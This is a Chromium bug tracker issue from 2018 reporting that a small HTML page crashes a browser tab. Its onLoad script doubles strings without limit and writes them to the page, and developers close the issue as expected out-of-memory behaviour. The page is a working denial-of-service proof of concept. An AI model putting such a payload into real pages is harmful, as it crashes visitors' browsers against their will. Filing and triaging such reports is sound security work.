New issue
Advanced search Search tips

Issue 811721 link

Starred by 3 users
Status: WontFix
Owner: ----
Closed: Feb 2018
Cc:
siggi@chromium.org
pnangunoori@chromium.org
nyerramilli@chromium.org
bokan@chromium.org
Components:
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 2
Type: Bug



Sign in to add a comment

DOS

Reported by ali.wami...@gmail.com, Feb 13 2018 
UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36

Steps to reproduce the problem:
<html>
<title>DoS</title>
<head>
<script>
function Lox()
 {

    var longunistring1 = unescape("%u4141%u4141");
    var longunistring2 = unescape("%u4242%u4242");
    var longunistring3 = unescape("%u4343%u4343");
    var longunistring4 = unescape("%u4444%u4444");

    for(i=0; i <= 100 ; ++i) 
 {
        longunistring1+=longunistring1;
        longunistring2+=longunistring2;
        longunistring3+=longunistring3;
        longunistring4+=longunistring4;
        document.write(longunistring1);
        document.write(longunistring2);
        document.write(longunistring3);
        document.write(longunistring4);
    }    
    document.write(longunistring1);
    document.write(longunistring2);
    document.write(longunistring3);
    document.write(longunistring4);
}
</script>
</head>
<body onLoad="Lox()">
</body>
</html> 
save it as html and open it 

What is the expected behavior?

What went wrong?
aw snap something went wrong while displaying this webpage

Crashed report ID: 

How much crashed? Just one tab

Is it a problem with a plugin? N/A 

Did this work before? N/A 

Chrome version: 64.0.3282.140  Channel: stable
OS Version: 10.0
Flash Version:
a.html
870 bytes View Download

Comment 1 by manoranj...@chromium.org, Feb 13 2018

Labels: Needs-Triage-M64

Comment 2 by pnangunoori@chromium.org, Feb 14 2018

Cc: nyerramilli@chromium.org pnangunoori@chromium.org siggi@chromium.org
Components: Blink
Labels: RegressedIn-66 Target-66 Target-65 Target-64
Status: Untriaged (was: Unconfirmed)
Tested on latest Chrome Stable #64.0.3282.168, Beta #65.0.3325.51 and Dev #66.0.3343.3 on Windows 10 and and Ubuntu 14.04 and able to reproduce the issue. However issue is not reproduced on latest Canary #66.0.3347.0

Using the per-revision bisect providing the bisect results,
Good build: 66.0.3345.0 (536026)
Bad build: 66.0.3344.0 (535592)

Changelog: https://chromium.googlesource.com/chromium/src/+log/66.0.3344.0..66.0.3345.0?pretty=fuller&n=10000

Unable to provide the per-revision reverse bisect because of:
1. Script provided all bad builds - All the builds gave "Aw Snap" error.
2. Even increasing the range by 200 revisions didn't help.
3. hasbisect (old script) also gave all bad builds.

Hence, providing the manual bisect and possible changes might be reason for the fix in Canary 

https://chromium.googlesource.com/chromium/src/+/ebfbdfbdee3316102012805778197ddc75ed01fd

CC'ing the above file owner.

siggi@ -- Could you please look into this issue and kindly reassign to the possible owner and merge the changes to Stable, Beta and Dev builds.

Note: In Mac 10.3.3 - It gave a continuous loading screen and error is not displayed nor page is loaded (checked form more than 10 minutes).

Thanks in advance!
811721.PNG
48.5 KB View Download

Comment 3 by bokan@chromium.org, Feb 15 2018

Cc: bokan@chromium.org
Components: -Blink Blink>JavaScript
You're trying to write strings of length 2^100 so it's not surprising that causes issues. Not sure there's much to do about this but over to Javascript folks to decide.

Comment 4 by siggi@chromium.org, Feb 20 2018

Status: WontFix (was: Untriaged)
Renderers should crash when they run out of memory, so this is working as intended.

Sign in to add a comment